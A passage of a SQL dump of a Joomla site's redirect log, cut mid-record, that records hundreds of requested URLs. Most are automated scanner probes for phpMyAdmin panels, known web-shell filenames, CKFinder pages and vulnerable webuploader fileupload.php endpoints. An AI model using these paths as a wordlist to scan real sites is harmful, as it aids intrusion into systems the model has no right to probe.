00:00:00',301),(34757,'https://3s-technologies.com.tr/sqlmanager/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:13','0000-00-00 00:00:00',301),(34758,'https://3s-technologies.com.tr/sql/sqlweb/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:14','0000-00-00 00:00:00',301),(34759,'https://3s-technologies.com.tr/db/phpmyadmin5/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:14','0000-00-00 00:00:00',301),(34760,'https://3s-technologies.com.tr/phpmyadmin-5.2/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:15','0000-00-00 00:00:00',301),(34761,'https://3s-technologies.com.tr/pma/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:16','0000-00-00 00:00:00',301),(34762,'https://3s-technologies.com.tr/sql/phpmanager/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:16','0000-00-00 00:00:00',301),(34763,'https://3s-technologies.com.tr/sql/phpmyadmin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:17','0000-00-00 00:00:00',301),(34764,'https://3s-technologies.com.tr/phpmyadmin-4/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:20','0000-00-00 00:00:00',301),(34765,'https://3s-technologies.com.tr/sql/sql-admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:21','0000-00-00 00:00:00',301),(34766,'https://3s-technologies.com.tr/1phpmyadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:22','0000-00-00 00:00:00',301),(34767,'https://3s-technologies.com.tr/mysql/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:23','0000-00-00 00:00:00',301),(34768,'https://3s-technologies.com.tr/phpmyadmin-latest-all-languages/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:24','0000-00-00 00:00:00',301),(34769,'https://3s-technologies.com.tr/phpmyadmin-5.2.1-english/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:24','0000-00-00 00:00:00',301),(34770,'https://3s-technologies.com.tr/db/phpmyadmin/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:25','0000-00-00 00:00:00',301),(34771,'https://3s-technologies.com.tr/admin/web/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:26','0000-00-00 00:00:00',301),(34772,'https://3s-technologies.com.tr/mysql/pma/index.php?lang=en',NULL,'','',7,0,'2024-05-18 04:24:26','0000-00-00 00:00:00',301),(34773,'https://3s-technologies.com.tr/sql/phpmyadmin3/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:27','0000-00-00 00:00:00',301),(34774,'https://3s-technologies.com.tr/mysqladmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:28','0000-00-00 00:00:00',301),(34775,'https://3s-technologies.com.tr/phpmyadmin-5.1.2/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:29','0000-00-00 00:00:00',301),(34776,'https://3s-technologies.com.tr/phpmyadmin6/index.php?lang=en',NULL,'','',7,0,'2024-05-18 04:24:30','0000-00-00 00:00:00',301),(34777,'https://3s-technologies.com.tr/phpmy/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:31','0000-00-00 00:00:00',301),(34778,'https://3s-technologies.com.tr/phpmyadmin2019/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:32','0000-00-00 00:00:00',301),(34779,'https://3s-technologies.com.tr/sql/myadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:32','0000-00-00 00:00:00',301),(34780,'https://3s-technologies.com.tr/sql/sql/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:34','0000-00-00 00:00:00',301),(34781,'https://3s-technologies.com.tr/db/phpmyadmin-5/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:34','0000-00-00 00:00:00',301),(34782,'https://3s-technologies.com.tr/php-myadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:35','0000-00-00 00:00:00',301),(34783,'https://3s-technologies.com.tr/phpmyadmin-5.2.0/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:36','0000-00-00 00:00:00',301),(34784,'https://3s-technologies.com.tr/admin/pma/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:36','0000-00-00 00:00:00',301),(34785,'https://3s-technologies.com.tr/program/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:37','0000-00-00 00:00:00',301),(34786,'https://3s-technologies.com.tr/db/phpmyadmin-3/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:38','0000-00-00 00:00:00',301),(34787,'https://3s-technologies.com.tr/phpmyadmin4/index.php?lang=en',NULL,'','',8,0,'2024-05-18 04:24:38','0000-00-00 00:00:00',301),(34788,'https://3s-technologies.com.tr/db/phpmyadmin-4/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:40','0000-00-00 00:00:00',301),(34789,'https://3s-technologies.com.tr/admin/sysadmin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:40','0000-00-00 00:00:00',301),(34790,'https://3s-technologies.com.tr/phppma/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:42','0000-00-00 00:00:00',301),(34791,'https://3s-technologies.com.tr/mysql/db/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:42','0000-00-00 00:00:00',301),(34792,'https://3s-technologies.com.tr/sql/webadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:43','0000-00-00 00:00:00',301),(34793,'https://3s-technologies.com.tr/sql/phpmyadmin5/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:44','0000-00-00 00:00:00',301),(34794,'https://3s-technologies.com.tr/db/websql/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:44','0000-00-00 00:00:00',301),(34795,'https://3s-technologies.com.tr/mysql/web/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:46','0000-00-00 00:00:00',301),(34796,'https://3s-technologies.com.tr/phpmyadmin-5/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:48','0000-00-00 00:00:00',301),(34797,'https://3s-technologies.com.tr/phpmyadmin5.2/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:49','0000-00-00 00:00:00',301),(34798,'https://3s-technologies.com.tr/phpmyadmin-4.9.7/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:50','0000-00-00 00:00:00',301),(34799,'https://3s-technologies.com.tr/mysqlmanager/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:50','0000-00-00 00:00:00',301),(34800,'https://3s-technologies.com.tr/db/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:51','0000-00-00 00:00:00',301),(34801,'https://3s-technologies.com.tr/db/dbweb/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:52','0000-00-00 00:00:00',301),(34802,'https://3s-technologies.com.tr/administrator/db/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:52','0000-00-00 00:00:00',301),(34803,'https://3s-technologies.com.tr/sql/phpmyadmin2/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:54','0000-00-00 00:00:00',301),(34804,'https://3s-technologies.com.tr/phpmyadmin2017/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:54','0000-00-00 00:00:00',301),(34805,'https://3s-technologies.com.tr/phpmyadmin2020/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:55','0000-00-00 00:00:00',301),(34806,'https://3s-technologies.com.tr/sql/websql/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:56','0000-00-00 00:00:00',301),(34807,'https://3s-technologies.com.tr/phpmyadmin6.0/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:56','0000-00-00 00:00:00',301),(34808,'https://3s-technologies.com.tr/phpmyadmin-5.2.1-all-languages/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:57','0000-00-00 00:00:00',301),(34809,'https://3s-technologies.com.tr/sql/php-myadmin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:24:58','0000-00-00 00:00:00',301),(34810,'https://3s-technologies.com.tr/phpmyadmin-latest/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:58','0000-00-00 00:00:00',301),(34811,'https://3s-technologies.com.tr/2phpmyadmin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:24:59','0000-00-00 00:00:00',301),(34812,'https://3s-technologies.com.tr/phpmyadmin-3/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:00','0000-00-00 00:00:00',301),(34813,'https://3s-technologies.com.tr/administrator/admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:01','0000-00-00 00:00:00',301),(34814,'https://3s-technologies.com.tr/phpmyadmin-5.2.0-all-languages/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:25:02','0000-00-00 00:00:00',301),(34815,'https://3s-technologies.com.tr/mysql/admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:03','0000-00-00 00:00:00',301),(34816,'https://3s-technologies.com.tr/phpmyadmin2021/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:03','0000-00-00 00:00:00',301),(34817,'https://3s-technologies.com.tr/db/webadmin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:25:04','0000-00-00 00:00:00',301),(34818,'https://3s-technologies.com.tr/_phpmyadmin/index.php?lang=en',NULL,'','',7,0,'2024-05-18 04:25:05','0000-00-00 00:00:00',301),(34819,'https://3s-technologies.com.tr/mysql-admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:06','0000-00-00 00:00:00',301),(34820,'https://3s-technologies.com.tr/phpmy-admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:07','0000-00-00 00:00:00',301),(34821,'https://3s-technologies.com.tr/phpmyadmin-4.9.10-all-languages/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:08','0000-00-00 00:00:00',301),(34822,'https://3s-technologies.com.tr/administrator/web/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:25:08','0000-00-00 00:00:00',301),(34823,'https://3s-technologies.com.tr/mysql/sqlmanager/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:09','0000-00-00 00:00:00',301),(34824,'https://3s-technologies.com.tr/sql/webdb/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:10','0000-00-00 00:00:00',301),(34825,'https://3s-technologies.com.tr/mysql/dbadmin/index.php?lang=en',NULL,'','',3,0,'2024-05-18 04:25:11','0000-00-00 00:00:00',301),(34826,'https://3s-technologies.com.tr/php-my-admin/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:11','0000-00-00 00:00:00',301),(34827,'https://3s-technologies.com.tr/shopdb/index.php?lang=en',NULL,'','',4,0,'2024-05-18 04:25:12','0000-00-00 00:00:00',301),(34828,'http://3s-technologies.com.tr/tr/wp-content/themes/xstore/js/portfolio.min.js',NULL,'','',4,0,'2024-05-18 04:47:36','0000-00-00 00:00:00',301),(34829,'https://3s-technologies.com.tr/tr//contact',NULL,'','',6,0,'2024-05-19 14:21:37','0000-00-00 00:00:00',301),(34830,'https://3s-technologies.com.tr/en/wp-aa.php',NULL,'www.google.com','',1,0,'2024-05-20 12:52:45','0000-00-00 00:00:00',301),(34831,'http://3s-technologies.com.tr/tr/archivarix.cms.php',NULL,'http://3s-technologies.com.tr/tr/archivarix.cms.php','',8,0,'2024-05-21 14:38:52','0000-00-00 00:00:00',301),(34832,'http://3s-technologies.com.tr/tr/wzy.php?action=door123',NULL,'','',9,0,'2024-05-22 15:59:39','0000-00-00 00:00:00',301),(34833,'http://3s-technologies.com.tr/tr/worm0.php7',NULL,'','',21,0,'2024-05-22 15:59:46','0000-00-00 00:00:00',301),(34834,'http://3s-technologies.com.tr/tr/gawean.php7',NULL,'','',22,0,'2024-05-22 15:59:49','0000-00-00 00:00:00',301),(34835,'http://3s-technologies.com.tr/tr/defaults.php',NULL,'','',135,0,'2024-05-22 16:00:19','0000-00-00 00:00:00',301),(34836,'http://3s-technologies.com.tr/tr/ioxi01.php',NULL,'','',3,0,'2024-05-22 16:00:25','0000-00-00 00:00:00',301),(34837,'http://3s-technologies.com.tr/tr/wp-content/pm.php',NULL,'','',2,0,'2024-05-22 16:00:36','0000-00-00 00:00:00',301),(34838,'http://3s-technologies.com.tr/tr/wp-content/themes/twentystd',NULL,'','',1,0,'2024-05-23 19:14:51','0000-00-00 00:00:00',301),(34839,'http://3s-technologies.com.tr/tr/wp-content/themes/twentystd/index.php',NULL,'','',1,0,'2024-05-23 19:14:55','0000-00-00 00:00:00',301),(34840,'http://www.3s-technologies.com.tr/tr/upload/e/data/html/postinfo.js',NULL,'http://www.3s-technologies.com.tr/upload/e/data/html/postinfo.js','',1,0,'2024-05-24 05:57:03','0000-00-00 00:00:00',301),(34841,'https://3s-technologies.com.tr/en/wp-content/plugins/fix/up.php',NULL,'www.google.com','',2,0,'2024-05-24 10:31:33','0000-00-00 00:00:00',301),(34842,'https://3s-technologies.com.tr/tr/enhance',NULL,'','',1,0,'2024-05-24 10:54:33','0000-00-00 00:00:00',301),(34843,'https://www.3s-technologies.com.tr/tr/enhance',NULL,'','',1,0,'2024-05-24 11:53:41','0000-00-00 00:00:00',301),(34844,'http://3s-technologies.com.tr/en/wp-includes/js/jquery/jquery.js',NULL,'www.google.com','',7,0,'2024-05-25 15:10:08','0000-00-00 00:00:00',301),(34845,'http://3s-technologies.com.tr/en/wp-add.php?a=c',NULL,'www.google.com','',3,0,'2024-05-25 21:07:48','0000-00-00 00:00:00',301),(34846,'https://3s-technologies.com.tr/en/hosting.php',NULL,'www.google.com','',1,0,'2024-05-27 13:26:59','0000-00-00 00:00:00',301),(34847,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=50&language=tr-tr',NULL,'','',6,0,'2024-05-30 11:42:23','0000-00-00 00:00:00',301),(34848,'https://3s-technologies.com.tr/tr/using-joomla/extensions/components/content-component/article-category-list?id=35&language=tr-tr',NULL,'','',7,0,'2024-05-31 14:22:15','0000-00-00 00:00:00',301),(34849,'http://3s-technologies.com.tr/tr/ana-sayfa/80-turkish-tr/turkish-content/100-panasonic-overview',NULL,'','',2,0,'2024-06-04 12:48:58','0000-00-00 00:00:00',301),(34850,'http://3s-technologies.com.tr/tr/blogs/wp-login.php',NULL,'','',3,0,'2024-06-07 05:31:18','0000-00-00 00:00:00',301),(34851,'http://3s-technologies.com.tr/ss.php',NULL,'','',9,0,'2024-06-07 15:07:20','0000-00-00 00:00:00',301),(34852,'https://3s-technologies.com.tr/tr/owa',NULL,'https://3s-technologies.com.tr/owa','',2,0,'2024-06-10 00:15:12','0000-00-00 00:00:00',301),(34853,'http://3s-technologies.com.tr/en/wp-admin/inputs.php',NULL,'www.google.com','',3,0,'2024-06-10 23:46:36','0000-00-00 00:00:00',301),(34854,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-theme-editor/include.php',NULL,'','',44,0,'2024-06-12 18:02:32','0000-00-00 00:00:00',301),(34855,'http://3s-technologies.com.tr/tr/wp-includes/inputs.php',NULL,'','',7,0,'2024-06-12 18:48:12','0000-00-00 00:00:00',301),(34856,'http://3s-technologies.com.tr/tr/wp-content/uploads/inputs.php',NULL,'','',7,0,'2024-06-12 18:48:29','0000-00-00 00:00:00',301),(34857,'http://3s-technologies.com.tr/tr/wp-content/plugins/inputs.php',NULL,'','',7,0,'2024-06-12 18:48:42','0000-00-00 00:00:00',301),(34858,'http://3s-technologies.com.tr/tr/wp-admin/inputs.php',NULL,'','',8,0,'2024-06-12 18:48:56','0000-00-00 00:00:00',301),(34859,'https://proneo-led.com/3s-technologies.com.tr/joomla/tr/pcb-prototip-prototyping',NULL,'https://proneo-led.com/3s-technologies.com.tr/joomla/tr/?option=com_content&view=article&id=48:mx400&catid=36:orta-hizli&Itemid=69','',1,0,'2024-06-13 12:28:32','0000-00-00 00:00:00',301),(34860,'https://3s-technologies.com.tr/en/js/ckfinder/ckfinder.html',NULL,'','',4,0,'2024-06-13 14:58:43','0000-00-00 00:00:00',301),(34861,'https://3s-technologies.com.tr/en/ckfinder/ckfinder.html',NULL,'','',4,0,'2024-06-13 14:58:43','0000-00-00 00:00:00',301),(34862,'https://3s-technologies.com.tr/en/ckeditor/ckfinder/ckfinder.html',NULL,'','',2,0,'2024-06-13 14:58:44','0000-00-00 00:00:00',301),(34863,'https://3s-technologies.com.tr/en/sites/all/libraries/ckfinder/ckfinder.html',NULL,'','',2,0,'2024-06-13 14:58:44','0000-00-00 00:00:00',301),(34864,'https://3s-technologies.com.tr/en/admin/ckfinder/ckfinder.html',NULL,'','',4,0,'2024-06-13 14:58:44','0000-00-00 00:00:00',301),(34865,'https://3s-technologies.com.tr/en/wp-content/plugins/wp-theme-editor/include.php',NULL,'www.google.com','',1,0,'2024-06-14 06:10:23','0000-00-00 00:00:00',301),(34866,'http://www.3s-technologies.com.tr/tr/includes/libraries/fileupload.php',NULL,'http://www.3s-technologies.com.tr/includes/libraries/fileupload.php','',2,0,'2024-06-14 08:09:05','0000-00-00 00:00:00',301),(34867,'http://www.3s-technologies.com.tr/tr/easycode-admin/src/main/webapp/web-inf/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/easycode-admin/src/main/webapp/WEB-INF/Widget/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:12','0000-00-00 00:00:00',301),(34868,'http://www.3s-technologies.com.tr/tr/classes/static/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/classes/static/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:14','0000-00-00 00:00:00',301),(34869,'http://www.3s-technologies.com.tr/tr/static/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/static/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:17','0000-00-00 00:00:00',301),(34870,'http://www.3s-technologies.com.tr/tr/public/assets/webuploader-master/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/assets/webuploader-master/server/fileupload.php','',2,0,'2024-06-14 08:09:19','0000-00-00 00:00:00',301),(34871,'http://www.3s-technologies.com.tr/tr/vendor/iisns/yii2-webuploader/assets/fileupload.php',NULL,'http://www.3s-technologies.com.tr/vendor/iisns/yii2-webuploader/assets/fileupload.php','',2,0,'2024-06-14 08:09:20','0000-00-00 00:00:00',301),(34872,'http://www.3s-technologies.com.tr/tr/public/back/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/back/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:23','0000-00-00 00:00:00',301),(34873,'http://www.3s-technologies.com.tr/tr/public/assets/vendor/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/assets/vendor/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:09:24','0000-00-00 00:00:00',301),(34874,'http://www.3s-technologies.com.tr/tr/public/complexplugin/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/complexPlugin/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:09:25','0000-00-00 00:00:00',301),(34875,'http://www.3s-technologies.com.tr/tr/public/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:27','0000-00-00 00:00:00',301),(34876,'http://www.3s-technologies.com.tr/tr/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:34','0000-00-00 00:00:00',301),(34877,'http://www.3s-technologies.com.tr/tr/uploader/fileupload.php',NULL,'http://www.3s-technologies.com.tr/uploader/fileupload.php','',2,0,'2024-06-14 08:09:35','0000-00-00 00:00:00',301),(34878,'http://www.3s-technologies.com.tr/tr/web-inf/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/WEB-INF/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:42','0000-00-00 00:00:00',301),(34879,'http://www.3s-technologies.com.tr/tr/public/admin/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/Admin/Widget/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:44','0000-00-00 00:00:00',301),(34880,'http://www.3s-technologies.com.tr/tr/h-ui.admin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/H-ui.admin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:45','0000-00-00 00:00:00',301),(34881,'http://www.3s-technologies.com.tr/tr/public/vendor/webupload/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/vendor/webupload/server/fileupload.php','',2,0,'2024-06-14 08:09:46','0000-00-00 00:00:00',301),(34882,'http://www.3s-technologies.com.tr/tr/vendor/webupload/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/vendor/webupload/server/fileupload.php','',2,0,'2024-06-14 08:09:47','0000-00-00 00:00:00',301),(34883,'http://www.3s-technologies.com.tr/tr/public/web/mysys/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/web/mysys/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:49','0000-00-00 00:00:00',301),(34884,'http://www.3s-technologies.com.tr/tr/resources/views/web/mysys/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/resources/views/web/mysys/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:51','0000-00-00 00:00:00',301),(34885,'http://www.3s-technologies.com.tr/tr/src/main/resources/static/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/src/main/resources/static/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:52','0000-00-00 00:00:00',301),(34886,'http://www.3s-technologies.com.tr/tr/static/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/static/Widget/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:53','0000-00-00 00:00:00',301),(34887,'http://www.3s-technologies.com.tr/tr/adminassets/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/AdminAssets/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:54','0000-00-00 00:00:00',301),(34888,'http://www.3s-technologies.com.tr/tr/public/js/hdjs/package/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/js/hdjs/package/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:09:56','0000-00-00 00:00:00',301),(34889,'http://www.3s-technologies.com.tr/tr/public/widget/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/Widget/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:57','0000-00-00 00:00:00',301),(34890,'http://www.3s-technologies.com.tr/tr/public/js/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/Js/Webuploader/server/fileupload.php','',2,0,'2024-06-14 08:09:58','0000-00-00 00:00:00',301),(34891,'http://www.3s-technologies.com.tr/tr/public/static/hadmin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/static/hadmin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:09:59','0000-00-00 00:00:00',301),(34892,'http://www.3s-technologies.com.tr/tr/web-inf/resources/h-ui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/WEB-INF/resources/h-ui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:00','0000-00-00 00:00:00',301),(34893,'http://www.3s-technologies.com.tr/tr/public/agent/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/agent/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:02','0000-00-00 00:00:00',301),(34894,'http://www.3s-technologies.com.tr/tr/public/admin/huiadmin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/admin/huiadmin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:03','0000-00-00 00:00:00',301),(34895,'http://www.3s-technologies.com.tr/tr/public/admin/admin_style/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/admin/admin_style/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:04','0000-00-00 00:00:00',301),(34896,'http://www.3s-technologies.com.tr/tr/text/webuploader-0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/text/webuploader-0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:05','0000-00-00 00:00:00',301),(34897,'http://www.3s-technologies.com.tr/tr/public/admin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/Admin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:07','0000-00-00 00:00:00',301),(34898,'http://www.3s-technologies.com.tr/tr/public/org/hdjs/package/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/org/hdjs/package/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:08','0000-00-00 00:00:00',301),(34899,'http://www.3s-technologies.com.tr/tr/public/home/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Public/Home/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:09','0000-00-00 00:00:00',301),(34900,'http://www.3s-technologies.com.tr/tr/admin/tpl/public/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/Admin/Tpl/public/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:10','0000-00-00 00:00:00',301),(34901,'http://www.3s-technologies.com.tr/tr/application/index/view/layout/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/application/index/view/layout/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:11','0000-00-00 00:00:00',301),(34902,'http://www.3s-technologies.com.tr/tr/templates/main/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/templates/main/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:12','0000-00-00 00:00:00',301),(34903,'http://www.3s-technologies.com.tr/tr/admin/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/admin/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:13','0000-00-00 00:00:00',301),(34904,'http://www.3s-technologies.com.tr/tr/lib/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/lib/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:15','0000-00-00 00:00:00',301),(34905,'http://www.3s-technologies.com.tr/tr/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:16','0000-00-00 00:00:00',301),(34906,'http://www.3s-technologies.com.tr/tr/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:22','0000-00-00 00:00:00',301),(34907,'http://www.3s-technologies.com.tr/tr/admin/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/admin/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:23','0000-00-00 00:00:00',301),(34908,'http://www.3s-technologies.com.tr/tr/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:24','0000-00-00 00:00:00',301),(34909,'http://www.3s-technologies.com.tr/tr/admin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/admin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:25','0000-00-00 00:00:00',301),(34910,'http://www.3s-technologies.com.tr/tr/static/admin/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/static/admin/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:27','0000-00-00 00:00:00',301),(34911,'http://www.3s-technologies.com.tr/tr/public/static/admin/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/static/admin/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:33','0000-00-00 00:00:00',301),(34912,'http://www.3s-technologies.com.tr/tr/static/hui/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/static/hui/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:35','0000-00-00 00:00:00',301),(34913,'http://www.3s-technologies.com.tr/tr/public/static/lib/webuploader/0.1.5/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/static/lib/webuploader/0.1.5/server/fileupload.php','',2,0,'2024-06-14 08:10:38','0000-00-00 00:00:00',301),(34914,'http://www.3s-technologies.com.tr/tr/public/static/admin/lib/webuploader/server/fileupload.php',NULL,'http://www.3s-technologies.com.tr/public/static/admin/lib/webuploader/server/fileupload.php','',2,0,'2024-06-14 08:10:40','0000-00-00 